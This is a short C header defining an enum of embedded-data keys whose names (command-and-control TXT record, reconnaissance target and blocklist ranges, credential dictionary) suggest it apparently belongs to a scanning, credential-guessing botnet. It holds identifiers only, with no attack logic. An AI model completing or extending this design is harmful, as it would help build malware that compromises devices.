#pragma once
#include "util_ct.h"


typedef enum {
	PRNE_DATA_KEY_NONE = -1,

	PRNE_DATA_KEY_PROG_VER,
	PRNE_DATA_KEY_SHG_SALT,
	PRNE_DATA_KEY_X509_CA_CRT,
	PRNE_DATA_KEY_X509_DH,
	PRNE_DATA_KEY_X509_S_CRT,
	PRNE_DATA_KEY_X509_S_KEY,
	PRNE_DATA_KEY_X509_C_CRT,
	PRNE_DATA_KEY_X509_C_KEY,
	PRNE_DATA_KEY_RESOLV_NS_IPV4,
	PRNE_DATA_KEY_RESOLV_NS_IPV6,
	PRNE_DATA_KEY_CNC_TXT_REC,
	PRNE_DATA_KEY_RCN_PORTS,
	PRNE_DATA_KEY_RCN_T_IPV4,
	PRNE_DATA_KEY_RCN_BL_IPV4,
	PRNE_DATA_KEY_RCN_T_IPV6,
	PRNE_DATA_KEY_RCN_BL_IPV6,
	PRNE_DATA_KEY_CRED_DICT,
	PRNE_DATA_KEY_EXEC_NAME,
	PRNE_DATA_KEY_VER_MAT,

	NB_PRNE_DATA_KEY
} prne_data_key_t;
